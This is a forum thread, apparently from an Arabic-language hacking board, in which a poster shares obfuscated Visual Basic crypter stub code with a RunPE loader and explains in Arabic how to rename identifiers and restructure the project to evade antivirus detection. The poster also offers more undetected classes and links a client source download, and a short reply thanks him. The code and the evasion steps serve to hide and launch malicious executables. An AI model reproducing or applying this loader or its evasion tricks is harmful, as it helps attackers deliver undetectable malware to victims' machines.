EAMdszBKidGIpvOMsnomrcjqGhhwmphFjNLiCtkxHrqeeFNaCBZrDrpjByUEPURduvQRbmgyiEoyEAMdszBK "dGIvOQM" GoTo gJZFLfndIDECHslQxjzDFxQzeOJySANZHGugHeqEmDptTH QxjzDFxQzeOJySANZHGugHeqEmDptTHe8F8a o3D0n(P3O3E) GoTo zROlHglitwLhirBwpIcvqfKTUS DQPgkneDSLdfAdhvraoNNoxJFlIbAbmgyiEoDSLvdfAdhvraoNN "xJmFIbA" GoTo EAMdszBKidGIpvOMsnomrcjqGhhwmphFjNLiCtkxHrqeeFNaCBZrDrpjByUEPURduvQRb zROlHglitwLhirBwpIcvqfKTUSCall o8a0m(&HB8I) GoTo IBJnAzPTVNnCufMOjLQfJQKxYutVCTGKkVPifBYwokwMcxluRM IBJnAzPTVNnCufMOjLQfJQKxYutVCTGKkQ7G3G CallWindowProcW(VarPtr(G6k3X(0))) End If End Function Private Sub o8a0m(ByVal W4c3t As ByteByRef iCounter As Long) GoTo DRnpyHCgwOjCwmRdUtIBlSVqSBQYiFmPfLSltjOJKIN "szeEpF" GoTo lvQeQDfBzcJbMQqQcVol lvQeQDfBzcJbMQqQcVolxkkLThIcHgxJxvpHE "KVYj" GoTo eCurCTiDrAZTwyfzE BkmGjnByhuTTvDPsLrPG6k3X(iCounter) = W4c3t GoTo HhsmEoKuFLH kyGHRpkNOvBUdSytusx: GoTo pwMonDtvnMp pwMonDtvnMpTjnqiGVOygjDgkyuerQQ "AMpIoeDepjBlH" GoTo RAoJzqEOxxkkLThIcHg JxvpHEbKVcYjABQxkkLThIcHgxJxvpHE "KVYj" GoTo iFmPfLSltjOJKINzszeE FJMDdFlUQFaPGMDdFlUQFaPGUfNNAnNk "LtKwAaLFYUrNmso" GoTo bZePIPuGGV eCurCTiDrAZTwyfzECHEPhvDENmgJLsyRavqrpufmtJkkAqskJmQO "oJzqEO" GoTo CirrqvRZgKYQnqtlJZ CirrqvRZgKYQnqtlJZTjnqiGVOygjDgkyuerQQ "AMpIoeDepjBlH" GoTo BkmGjnByhuTTvDPsLrP iFmPfLSltjOJKINzszeEBQYiFmPfLSltjOJKIN "szeEpF" GoTo FJMDdFlUQFaPG DRnpyHCgwOjCwmRMDdFlUQFaPGUfNNAnNk "LtKwAaLFYUrNmso" GoTo dUtIBlSVqS HhsmEoKuFLHiCounter iCounter GoTo kyGHRpkNOvBUdSytusx RAoJzqEOxxkkLThIcHgCHEPhvDENmgJLsyRavqrpufmtJkkAqskJmQO "oJzqEO" GoTo JxvpHEbKVcYjABQ bZePIPuGGVEnd Sub Private Function o3D0n(ByVal b3J4g As Long) As n1p2y Dim u7H1b                      As G3u2t GoTo wqIrNxIOKVnCCtHRAAnnOQkLgKjAMBThUGiECfMePTuTfZr "LhFy" GoTo sKHfOZfbmDEaclI yuFQlGuEcQABiCHPThUGiECfMePTuTfZr "LhFy" GoTo luutyUcjNbaqtwoM zQrqGwzqPsYVDsFQlGuEcQABiCHPFlu "tyUcj" GoTo CtHRAAnnOQkLgKjAMB ChHtIMPHgJoYTIu7H1b.j0b0N b3J4g GoTo SJYiQQDqRo wqIrNxIOKVnCbaqtwoMcUEnpJmrEBkx "QyGTvOuSkK" GoTo zQrqGwzqPsYVDs SJYiQQDqRoLSet o3D0n u7H1b GoTo OwNzDdROIbYvQpvDGUqsBLGjzRmF luutyUcjNbaqtwoMFQlGuEcQABiCHPFlu "tyUcj" GoTo UEnpJmrEBkQQyGTvOuSkKlwqI PTuTfZroLhpUeediSLSxKJadgYwL "oQZtVao" GoTo yuFQlGuEcQABiCHP OwNzDdROIbYvQpvDGUqsBLGjzRmF: GoTo pUeediSLSxKJadgwLEoQZtVaoyThUGiECfM sKHfOZfbmDEaclIpUeediSLSxKJadgYwL "oQZtVao" GoTo SjPVpxmRNNMQC UEnpJmrEBkQQyGTvOuSkKlwqIbaqtwoMcUEnpJmrEBkx "QyGTvOuSkK" GoTo KUsnQSyFZgVBwxvAm SjPVpxmRNNMQCoAOwNzDdROIbYvQpvrDG "qsBLGjzRmF" GoTo ChHtIMPHgJoYTI pUeediSLSxKJadgwLEoQZtVaoyThUGiECfMoAOwNzDdROIbYvQpvrDG "qsBLGjzRmF" GoTo PTuTfZroLh KUsnQSyFZgVBwxvAmEnd Function
    نغلق و نرجع لــ FORM1 و نظغط عليه دووبل كليك

    و نكتب هذا الامر


    Call Main

    رايح اشرع هذه الطريقة احنا في البداية لم نحذف form

    و الان رجعنا لنتصل منه بـ sub main و هكذا لما نحفظ رايحين

    نحفظ على form و ليس على sub main كما هو منتشر و هذه الطريقة

    اعتقد تطرح للمرة الاولى

    و الهدف منها هو خداع بعض الحمايات

    و بهذه الطريقة حنا صنعنا ستب مكشوف من الافيرا فقط

    تستطيع تشفيرها بــ التقسيم فيه طريقة و لكن هي وحدها تحتاج الى شرح

    الان طريقة تشفير الستب اذا انكشف اولا طريقة تشفير الموديول في النطاق sub main

    و الكلمات الي تستطيع تغييرها


    [​IMG]

    ملاحظة اذا غيرت مثلا الكلمه Hello لازم تغيرها كلها لان توجد اكثر من كلمة

    بنفس الكلمة

    نيجي لتشفير runpe و هو المسؤول عن تشفير الستب

    على فكرة انا تعمدت ان يكون class و ليسmodule و السبب

    ان الكلاسس موجود و مستعمل بكثرة و انا عندي اكثر من عشرين كلاسس مشفرين

    و هذا اللي حطيتو استعمله مند شهرين تقريبا و مزال مشفر

    و لكن اللي يحتاج يبدل يبعتلي و انا رايح اعطيه ان شاء الله

    في حال حصلت على واحد و لم تعرف طريقة وضعه

    ما عليك غير تحذف الاول و تعوضه بالثاني و اكيد الكلمات رايحة تكون مختلفة

    و هو في العاده اسمه runpe ما عليك سوى تغيير كلمة واحد في هذا السطر


    Sami.Hi StrConv(Love(1), vbFromUnicode), App.Path & "\" & App.EXEName & ".exe"

    و هي الكلمة Hi تغيرها بـ runpe

    و هكذا و بكل سهولة و بدون برامج و لا خرابيش رايح تحصل على النتيجة المرجوة

    و الطريقة صالحة على اي ستب فيها الخصائص اللي ذكرتها

    تحميل سورس Client


    http://filaty.com/s/wTt

    الموضوع واضح انه متعوب عليه

    اهداء للجميع

    بالتوفيقــ
    :I."

     
  2. ExPLo!T-Dz

    ExPLo!T-Dz <div class="alqab2">.:: فريــق الـفحـص ::.</span> مساعد مشرف

    الأنتساب:
    ‏18 سبتمبر 2011
    المشاركات:
    69
    الإعجابات المتلقاة:
    4
    نقاط الجائزة:
    8
    الإقامة:
    D Z
    يعطيك العافيه
    ?:"
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة